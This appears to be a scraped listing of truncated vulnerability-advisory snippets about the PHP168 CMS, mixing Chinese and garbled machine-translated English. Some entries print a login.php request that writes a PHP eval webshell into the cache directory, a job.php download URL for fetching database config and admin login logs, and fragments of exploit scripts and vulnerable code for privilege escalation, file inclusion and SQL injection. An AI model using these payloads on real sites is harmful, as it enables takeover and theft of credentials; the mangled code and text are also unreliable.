PHP168后台查看/修改任意文件漏洞

No description provided by source...

PHP168 Template Editor - Filename Directory Traversal

PHP168 Template Editor - Filename Directory Traversal source: https://www.securityfocus.com/bid/42174/info PHP168 Template Editor is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. Exploiting the issue may allow an attacker to read...

PHP168 Template Editor - 'Filename' Directory Traversal

source: https://www.securityfocus.com/bid/42174/info PHP168 Template Editor is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. Exploiting the issue may allow an attacker to read and overwrite arbitrary files in the context of the...

PHP168 6.0 and below the version of vulnerability-vulnerability warning-the black bar safety net

Danger level: high //Looks like more and more public. Affected versions: PHP168 6.0 the following versions Intruders can be in the user landing page to construct a special statement, the PHP word written to the cache directory, so as to obtain the use of PHP168 whole Station program website the...

PHP168 6.0及以下版本login.php存在重大安全漏洞

PHP168整站系统一直以来受广大用户的亲睐，它凭借着自身的强大、稳定、安全、灵活、易用等多方面的优势 ... 架构与功能的不断完善，让PHP168成为了最主流CMS系统之一。 login.php参数处理不当，入侵者可以在用户登陆页面构造特殊语句，将PHP一句话写入cache目录，从而获得使用PHP168整站程序网站的WEBSHELL权限。 PHP168 6.0以下版本 暂无 等待官方补丁 login.php?makehtml=1&chdbhtmlname=honker.php&chdbpath=cache&content=?php%20@eval$POSThonker;?...

Php168 v6 mention the right vulnerability-vulnerability warning-the black bar safety net

? php printr' +---------------------------------------------------------------------------+ Php168 v6. 0 update user access exploit +---------------------------------------------------------------------------+ '; / works regardless of php. ini settings / if $argc 5 printr'...

php168 v5. 0 another injection vulnerabilities-vulnerability warning-the black bar safety net

by:xhming member/list.php if$step==2 if!$ aidDB //----------------------------------------- showerr"ÇëÖÁÉÙÑ¡ÔñÒ"ƪÎÄÕÂ"; elseif!$ Type showerr"ÇëÑ¡Ôñ2Ù×÷Ä¿±ê,ÊÇɾ3ý"1ÊÇÉóºËµÈ..."; if$Type=='yz' if$Tyz1 $Type=='unyz'; elseif$Type=='leavels' if$levels1 $Type='uncom'; else $levels=1; $Type='com';...

php168 v5. 0 injection vulnerability-vulnerability warning-the black bar safety net

by:xhming Home call requirePHP168PATH."inc/label.php"; Continue to follow up; label.php if$jobs=='show' if!$ COOKIEAdmin showerr"ÄãÎÞÈ2é¿"; //"ñÈ¡I·ÓëÎ2µÄ±êÇ© pregreplace'/$label\a-zA-Z0-9\+\/eis',"labelarrayhf'\\1'",readfilehtml"head",$headtpl;...

Php168 v6 privilege elevation vulnerability-vulnerability warning-the black bar safety net

| by Ryat http://www.hackgood.com Every day at work,I haven't post on the forum... Previously issued a php168 v2008 privilege elevation vulnerability,this vulnerability is also shown in the same code segment Directly gives the exp,inside some details or some mean,interested students can...

Php168 v6 privilege elevation vulnerability-vulnerability warning-the black bar safety net

by Ryat http://www.wolvez.org 2009-07-17 Every day at work,I haven't post on the forum... Previously issued a php168 v2008 privilege elevation vulnerability,this vulnerability is also shown in the same code segment Directly gives the exp,inside some details or some mean,interested students can...

Php168 v6 权限提升漏洞

天天上班,好久没在论坛发贴了... 以前发过一个php168 v2008的权限提升漏洞,这次的漏洞也出在相同的代码段,直接给出exp,里面的一些细节还是有些意思的,有兴趣的同学可以自行分析: mail:[email protected] PHP168 V6.0 暂无 请关注官方网址：http://www.php168.com/ !/usr/bin/php ?php printr' +---------------------------------------------------------------------------+ Php168 v6.0 update user...

Php168 a local file inclusion vulnerability-vulnerability warning-the black bar safety net

Php168 a local file inclusion vulnerability Looking at the v6 version,in do/job. php file: ... elseifereg dividing"^-0-9a-zA-Z+$",$GETjob||ereg"^-0-9a-zA-Z+$",$POSTjob requiredirnameFILE."/"." global.php"; ifisfilePHP168PATH."inc/job/$job.php" includePHP168PATH."inc/job/$job.php"; Well,if you ope...

Php168 本地文件包含漏洞

在do/job.php文件: ... elseifereg"^-0-9a-zA-Z+$",$GETjob||ereg"^-0-9a-zA-Z+$",$POSTjob requiredirnameFILE."/"."global.php"; ifisfilePHP168PATH."inc/job/$job.php" includePHP168PATH."inc/job/$job.php"; 嗯,如果开了全局的话,就可以用gpc的变量注册顺序来pass那个正则判断,不过php168很友善的搞了个模拟registerglobals=on的功能,在inc/common.inc.php文件:...

Php168 v2008 elevation of privilege vulnerability-vulnerability warning-the black bar safety net

by Ryat http://www.wolvez.org 2009-01-25 A simple analysis of this vulnerability PHP code 1. common.inc.php 2. 3. if$SERVER'HTTPCLIENTIP' 4. $onlineip=$SERVER'HTTPCLIENTIP'; 5. elseif$SERVER'HTTPXFORWARDEDFOR' 6. $onlineip=$SERVER'HTTPXFORWARDEDFOR'; 7. else 8. $onlineip=$SERVER'REMOTEADDR'; 9. 1...

php168 v2008 default setting of the disaster-vulnerability warning-the black bar safety net

index.php Section 6 3 line start 1. elseif$webdbNewsMakeHtml==1 //if it is to generate static and... 2. 3. $content=obgetcontents; 4. obendclean; 5. obstart; //spare 6. $content=makehtml$content,'index'; 7. echo "$content"; 8. makehtml function code 1. function makehtml$content,$pagetype=" 2...

PHP168 下载任意文件漏洞

PHP168整站是PHP领域当前功能最强大的建站系统，代码全部开源，可极其方便的进行二次开发，所有功能模块可以自由安装与删除，个人用户完全免费使用。 利用了程序的编码漏洞，下载配置和登陆日志文件 2008 暂无 http://www.php168.com/ 下载 mysqlconfig.php 和 adminloginlogs.php 两个文件到本地。 http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="...

PHP168 whole Station system of 0DAY-vulnerability warning-the black bar safety net

The first description under this hole is in the other places to see, just he did not say very clearly, a lot of the vegetable dishes are Do not understand, I take it I first posted it in! This hole is actually the use of the program coding vulnerabilities, download the configuration and the login...

Php168 读取任意文件漏洞

代码:..job.php Line:117 if eregi".php",$url die"ERR"; $fileurl=strreplace$webdbwwwurl,"",$url; ifisfilePHP168PATH."$fileurl"&&filesizePHP168PATH."$fileurl"10241024500 $filename=basename$fileurl; $filetype=substrstrrchr$filename,'.',1; $filename=pregreplace"/\d+200\d+^+.^.+/is","\3",$filename;...

Php168 read arbitrary file vulnerability-vulnerability warning-the black bar safety net

Reprint address: http://hi.baidu.com/saiyhi/ Oh, forgot to say, the program official URL: http://www.php168.com/ 代码 :..job.php Line:1 1 7 if eregi". php",$url die"ERR"; $fileurl=strreplace$webdbwwwurl,"",$url; ifisfilePHP168PATH."$ fileurl"&&filesizePHP168PATH."$ fileurl"1 0 2 41 0 2 45 0 0...

Php168 v2008 SQL注射漏洞

历经数年开发与完善的”PHP168整站系统”是国内最早的多功能模块化 网站管理软件系统；不仅适合于建设一般的企业、政府、学校、个人等小型网站，同时也适合于建设地区门户、行业门户、收费网站等大中型网站，80sec在其 产品中发现了一个严重的SQL注射漏洞，可能被恶意用户查询数据库的敏感信息，如管理员密码，加密key等等，从而控制整个网站。 在系统的jsarticle.php中，使用了urldecode用来解码用户提交的数据，但是在使用该函数之后并没有做进一步的有效性验证，从而导致精心构造的数据可以饶过系统的过滤以及php的Magic Quote保护，漏洞部分代码如下：...